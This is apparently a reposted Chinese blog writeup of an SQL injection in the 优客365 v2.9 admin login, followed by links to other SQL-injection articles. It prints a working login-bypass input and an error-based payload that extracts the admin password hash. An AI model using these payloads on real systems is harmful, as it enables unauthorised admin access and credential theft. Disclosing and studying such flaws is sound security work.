优客365 v2.9版本 后台存在SQL注入
安装
打开后台登陆界面
http://localhost:9096/yk365/system/login.php
输入单引号报错
得到表名
经过跟踪后在\module\login.php文件出现错误
代码处理不严谨。根据上图,经测试,用户名可以用1' or '1'='1进行绕过
但密码经过md5加密
接下来通过SQL注入得到md5加密后的密码
payload:' and (select 1 from(select count(*),concat(0x7e,(select user_pass from dir_users where user_id=1),0x7e,floor(rand(0)*2)) x from information_schema.columns group by x)a)--+
用sqlmap跑的时候跑不出
可以利用此方法在不知道用户名的情况下登陆进后台
转载于:https://www.cnblogs.com/wh4am1/p/7821811.html
优客365 v2.9版本 后台存在SQL注入相关推荐
- thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...
- 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- /plus/recommend.php sql注入漏洞,代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法 | Seay 渗透 编程 代码审计 网络安全博客...
显示不全请点击全屏阅读 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商 ...
- 某游戏公司后台数据库SQL注入事件分析
某游戏公司后台数据库SQL注入事件分析 人物关系简介 Blank –SA Dawn(Boss) Ryan –DBA Fred –离开公司的安全顾问 本案例出自于<Unix/Linux网络日志分析 ...
- Baidu某系统后台存在sql注入漏洞
漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞
漏洞分析 首先看下面的代码 /phpcms/modules/member/content.php 202行 edit函数 [php] public function edit() { $_userna ...
- 通达OA v11.7后台SQL注入
文章目录 漏洞描述 漏洞影响 漏洞分析 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器. 漏洞影响 通达OA <= v11.7 漏洞分析 下载通达o ...
- 基于pikachu漏洞平台的 --SQL注入攻击学习与总结
SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...
- Metinfo 5.3.17 前台SQL注入漏洞分析及实验
2017年08月07日 漏洞分析 作者:phith0n@长亭科技 原文地址:https://paper.seebug.org/371/ Metinfo 8月1日升级了版 ...
最新文章
- iOS--SDAutolayout宽度自适应
- input hidden的值存储在哪儿_kafka内核:消息存储模块的工作机制
- pythonmkdir语法错误_Python mkdir一个有难度的问题
- MySQL中select * for update锁表的范围
- arm linux驱动 知乎_引导 ARM Linux
- Deep Learning Notes: Chapter 1 Introduction
- 数据治理之数据质量管理
- 现代密码学概论|密码学基础--仿射密码实验C语言(文末附上C语言源代码)
- 如何批量查询身份证号码地址归属地,身份证性别男女,星座,身份证生肖,身份证年龄以及身份证是否校验合法,一篇文章介绍清楚
- 前中后序遍历的相互转化(附代码)
- 防火墙OPNsense安装
- 中M22春C、Java入门练习( 7-13 后天 )
- 北斗在线app服务器,北斗卫星导航app,北斗卫星导航app官网手机版预约 v1.0 - 浏览器家园...
- Linux配置文件-limits.conf
- Ubuntu18解决:Not creating XLA devices, tf_xla_enable_xla_devices not set
- 如何使用网线连接树莓派和电脑
- Glide加载图片模糊问题
- 【redis】二、redis数据类型
- 一维表转二维表(mysql)
- CentOS7 系统安全加固实施方案介绍
热门文章
- 大连理工大学计算机视觉实验室,首个镜子分割网络问世,大连理工、鹏城实验室、香港城大出品 | ICCV 2019...
- 西安工程大学计算机是几本专业,2016年西安工程大学计算机科学与技术(卓越班)专业在陕西录取分数线...
- linux安装 web2py,TurnkeyLinux上用于Web2Py到MySQL的DAL连接字符串
- 5.Hbase API 操作开发
- MultiRow发现之旅(五)- MultiRow版俄罗斯方块(exe + 源码)
- 升级 Xcode 4.3 后找不到 xcodebuild 的解决方法
- Android碎碎念 -- 广播LocalBroadcastManager的实现
- linux(ubuntu) 查看系统设备信息
- 微软2012年突破重围 主攻Windows Phone
- Android学习笔记--Android开发时常用控件(一)